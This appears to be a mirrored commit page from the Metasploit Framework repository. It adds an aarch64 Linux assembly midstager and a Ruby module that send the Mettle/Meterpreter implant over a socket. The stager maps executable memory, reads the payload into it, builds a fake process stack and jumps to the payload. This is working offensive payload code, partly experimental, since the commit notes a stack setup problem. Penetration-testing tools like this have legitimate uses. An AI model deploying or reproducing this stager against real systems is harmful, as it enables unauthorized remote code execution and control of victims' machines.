mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-10-02 07:40:19 +02:00
stager not setting up stack
This commit is contained in:
parent
6dbe00158f
commit
a2396991f0
137
external/source/shellcode/linux/aarch64/stage_mettle.s
vendored
Normal file
137
external/source/shellcode/linux/aarch64/stage_mettle.s
vendored
Normal file
@ -0,0 +1,137 @@
|
|||||||
|
.equ SYS_READ, 0x3f
|
||||||
|
.equ SYS_MMAP, 0xde
|
||||||
|
.equ SYS_EXIT, 0x5d
|
||||||
|
|
||||||
|
.equ SIZE, 0xeeeeeeee
|
||||||
|
.equ ENTRY, 0xffffffff
|
||||||
|
|
||||||
|
start:
|
||||||
|
adr x2, size
|
||||||
|
ldr w2, [x2]
|
||||||
|
mov x10, x2
|
||||||
|
|
||||||
|
/* Page-align, assume <4GB */
|
||||||
|
lsr x2, x2, #12
|
||||||
|
add x2, x2, #1
|
||||||
|
lsl x2, x2, #12
|
||||||
|
|
||||||
|
/* mmap(addr=0, length='x2', prot=7, flags=34, fd=0, offset=0) */
|
||||||
|
mov x0, xzr
|
||||||
|
mov x1, x2
|
||||||
|
mov x2, #7
|
||||||
|
mov x3, #34
|
||||||
|
mov x4, xzr
|
||||||
|
mov x5, xzr
|
||||||
|
mov x8, SYS_MMAP
|
||||||
|
svc 0
|
||||||
|
|
||||||
|
/* Grab the saved size, save the address */
|
||||||
|
mov x4, x10
|
||||||
|
|
||||||
|
/* Save the memory address */
|
||||||
|
mov x3, x0
|
||||||
|
mov x10, x0
|
||||||
|
|
||||||
|
read_loop:
|
||||||
|
/* read(sockfd, buf='x3', nbytes='x4') */
|
||||||
|
mov x0, x12
|
||||||
|
mov x1, x3
|
||||||
|
mov x2, x4
|
||||||
|
mov x8, SYS_READ
|
||||||
|
svc 0
|
||||||
|
cbz w0, failed
|
||||||
|
add x3, x3, x0
|
||||||
|
subs x4, x4, x0
|
||||||
|
bne read_loop
|
||||||
|
|
||||||
|
/* set up the initial stack */
|
||||||
|
/*
|
||||||
|
|
||||||
|
add sp, sp, #80
|
||||||
|
mov x4, #109
|
||||||
|
eor x5, x5, x5
|
||||||
|
stp x4, x5, [sp, #-16]!
|
||||||
|
|
||||||
|
mov x1,#2
|
||||||
|
mov x2,sp
|
||||||
|
mov x3,#0
|
||||||
|
|
||||||
|
mov x4,#2
|
||||||
|
mov x5,sp
|
||||||
|
mov x6,x12
|
||||||
|
mov x7,#0
|
||||||
|
mov x8,#0
|
||||||
|
mov x9,#7
|
||||||
|
mov x10,x10
|
||||||
|
mov x11,#0
|
||||||
|
mov x12,#0
|
||||||
|
|
||||||
|
eor x0, x0, x0
|
||||||
|
eor x1, x1, x1
|
||||||
|
eor x2, x2, x2
|
||||||
|
eor x3, x3, x3
|
||||||
|
stp x4, x5, [sp, #-16]!
|
||||||
|
stp x6, x7, [sp, #-16]!
|
||||||
|
stp x7, x8, [sp, #-16]!
|
||||||
|
stp x9, x10, [sp, #-16]!
|
||||||
|
stp x11, x12, [sp, #-16]!
|
||||||
|
*/
|
||||||
|
|
||||||
|
adr x0, entry
|
||||||
|
ldr x0, [x0]
|
||||||
|
// entry_offset + mmap
|
||||||
|
add x0, x0, x10
|
||||||
|
|
||||||
|
mov x8, x0
|
||||||
|
|
||||||
|
|
||||||
|
/* Set up the fake stack.
|
||||||
|
For whatever reason, aarch64 binaries really want AT_RANDOM
|
||||||
|
to be available. */
|
||||||
|
/* AT_NULL */
|
||||||
|
eor x0, x0, x0
|
||||||
|
eor x1, x1, x1
|
||||||
|
stp x0, x1, [sp, #-16]!
|
||||||
|
/* AT_RANDOM */
|
||||||
|
mov x2, #25
|
||||||
|
mov x3, sp
|
||||||
|
stp x2, x3, [sp, #-16]!
|
||||||
|
|
||||||
|
/* argc, argv[0], argv[1], envp */
|
||||||
|
/* ideally these could all be empty, but unfortunately
|
||||||
|
we have to keep the stack aligned. it's easier to
|
||||||
|
just push an extra argument than care... */
|
||||||
|
stp x0, x1, [sp, #-16]! /* argv[1] = NULL, envp = NULL */
|
||||||
|
mov x0, 1
|
||||||
|
mov x1, sp
|
||||||
|
stp x0, x1, [sp, #-16]! /* argc = 1, argv[0] = "" */
|
||||||
|
|
||||||
|
br x8
|
||||||
|
|
||||||
|
/*
|
||||||
|
mov x0, #109
|
||||||
|
mov x1, x12
|
||||||
|
stp x0, x1, [sp, #-16]! /* argv[1] = NULL, envp = NULL */
|
||||||
|
/* mov x0, 2
|
||||||
|
mov x1, sp
|
||||||
|
stp x0, x1, [sp, #-16]! /* argc = 1, argv[0] = "" */
|
||||||
|
|
||||||
|
/*
|
||||||
|
blr x8
|
||||||
|
*/
|
||||||
|
|
||||||
|
failed:
|
||||||
|
mov x0, 0
|
||||||
|
mov x8, SYS_EXIT
|
||||||
|
svc 0
|
||||||
|
|
||||||
|
.balign 16
|
||||||
|
size:
|
||||||
|
.word SIZE
|
||||||
|
.word 0
|
||||||
|
entry:
|
||||||
|
.word ENTRY
|
||||||
|
.word 0
|
||||||
|
m:
|
||||||
|
.word 0x0000006d
|
||||||
|
.word 0x00000000
|
109
modules/payloads/stages/linux/aarch64/meterpreter.rb
Normal file
109
modules/payloads/stages/linux/aarch64/meterpreter.rb
Normal file
@ -0,0 +1,109 @@
|
|||||||
|
##
|
||||||
|
# This module requires Metasploit: http://metasploit.com/download
|
||||||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
##
|
||||||
|
|
||||||
|
require 'msf/base/sessions/meterpreter_aarch64_linux'
|
||||||
|
require 'msf/base/sessions/meterpreter_options'
|
||||||
|
require 'msf/base/sessions/mettle_config'
|
||||||
|
require 'rex/elfparsey'
|
||||||
|
|
||||||
|
module MetasploitModule
|
||||||
|
include Msf::Sessions::MeterpreterOptions
|
||||||
|
include Msf::Sessions::MettleConfig
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(
|
||||||
|
update_info(
|
||||||
|
info,
|
||||||
|
'Name' => 'Linux Meterpreter',
|
||||||
|
'Description' => 'Inject the mettle server payload (staged)',
|
||||||
|
'Author' => [
|
||||||
|
'Adam Cammack <adam_cammack[at]rapid7.com>'
|
||||||
|
],
|
||||||
|
'Platform' => 'linux',
|
||||||
|
'Arch' => ARCH_AARCH64,
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'Session' => Msf::Sessions::Meterpreter_aarch64_Linux
|
||||||
|
)
|
||||||
|
)
|
||||||
|
end
|
||||||
|
|
||||||
|
def elf_ep(payload)
|
||||||
|
elf = Rex::ElfParsey::Elf.new(Rex::ImageSource::Memory.new(payload))
|
||||||
|
elf.elf_header.e_entry
|
||||||
|
end
|
||||||
|
|
||||||
|
def handle_intermediate_stage(conn, payload)
|
||||||
|
entry_offset = elf_ep(payload)
|
||||||
|
|
||||||
|
# Generated from external/source/shellcode/linux/aarch64/stage_mettle.s
|
||||||
|
midstager = [
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
0x10000582, # adr x2, b0 <size>
|
||||||
|
0xb9400042, # ldr w2, [x2]
|
||||||
|
0xaa0203ea, # mov x10, x2
|
||||||
|
0xd34cfc42, # lsr x2, x2, #12
|
||||||
|
0x91000442, # add x2, x2, #0x1
|
||||||
|
0xd374cc42, # lsl x2, x2, #12
|
||||||
|
0xaa1f03e0, # mov x0, xzr
|
||||||
|
0xaa0203e1, # mov x1, x2
|
||||||
|
0xd28000e2, # mov x2, #0x7 // #7
|
||||||
|
0xd2800443, # mov x3, #0x22 // #34
|
||||||
|
0xaa1f03e4, # mov x4, xzr
|
||||||
|
0xaa1f03e5, # mov x5, xzr
|
||||||
|
0xd2801bc8, # mov x8, #0xde // #222
|
||||||
|
0xd4000001, # svc #0x0
|
||||||
|
0xaa0a03e4, # mov x4, x10
|
||||||
|
0xaa0003e3, # mov x3, x0
|
||||||
|
0xaa0003ea, # mov x10, x0
|
||||||
|
0xaa0c03e0, # mov x0, x12
|
||||||
|
0xaa0303e1, # mov x1, x3
|
||||||
|
0xaa0403e2, # mov x2, x4
|
||||||
|
0xd28007e8, # mov x8, #0x3f // #63
|
||||||
|
0xd4000001, # svc #0x0
|
||||||
|
0x34000260, # cbz w0, a4 <failed>
|
||||||
|
0x8b000063, # add x3, x3, x0
|
||||||
|
0xeb000084, # subs x4, x4, x0
|
||||||
|
0x54ffff01, # b.ne 44 <read_loop>
|
||||||
|
0x10000280, # adr x0, b8 <entry>
|
||||||
|
0xf9400000, # ldr x0, [x0]
|
||||||
|
0x8b0a0000, # add x0, x0, x10
|
||||||
|
0xaa0003e8, # mov x8, x0
|
||||||
|
0xca000000, # eor x0, x0, x0
|
||||||
|
0xca010021, # eor x1, x1, x1
|
||||||
|
0xa9bf07e0, # stp x0, x1, [sp,#-16]!
|
||||||
|
0xd2800322, # mov x2, #0x19 // #25
|
||||||
|
0x910003e3, # mov x3, sp
|
||||||
|
0xa9bf0fe2, # stp x2, x3, [sp,#-16]!
|
||||||
|
0xa9bf07e0, # stp x0, x1, [sp,#-16]!
|
||||||
|
0xd2800020, # mov x0, #0x1 // #1
|
||||||
|
0x910003e1, # mov x1, sp
|
||||||
|
0xa9bf07e0, # stp x0, x1, [sp,#-16]!
|
||||||
|
0xd61f0100, # br x8
|
||||||
|
0xd2800000, # mov x0, #0x0 // #0
|
||||||
|
0xd2800ba8, # mov x8, #0x5d // #93
|
||||||
|
0xd4000001, # svc #0x0
|
||||||
|
payload.length,
|
||||||
|
0x00000000, # .word 0x00000000
|
||||||
|
entry_offset,
|
||||||
|
0x00000000, # .word 0x00000000
|
||||||
|
0x0000006d, # .word 0x0000006d
|
||||||
|
0x00000000, # .word 0x00000000
|
||||||
|
0xd503201f, # nop
|
||||||
|
0xd503201f, # nop
|
||||||
|
].pack('V*')
|
||||||
|
|
||||||
|
print_status("Transmitting intermediate midstager...(#{midstager.length} bytes)")
|
||||||
|
print_status("Transmitting intermediate paystager...(#{payload.length} bytes)")
|
||||||
|
conn.put([midstager.length].pack('V'))
|
||||||
|
conn.put(midstager) == midstager.length
|
||||||
|
end
|
||||||
|
|
||||||
|
def generate_stage(opts = {})
|
||||||
|
MetasploitPayloads::Mettle.new('aarch64-linux-musl',
|
||||||
|
generate_config(opts.merge({scheme: 'tcp'}))).to_binary :process_image
|
||||||
|
end
|
||||||
|
end
|
Loading…
Reference in New Issue
Block a user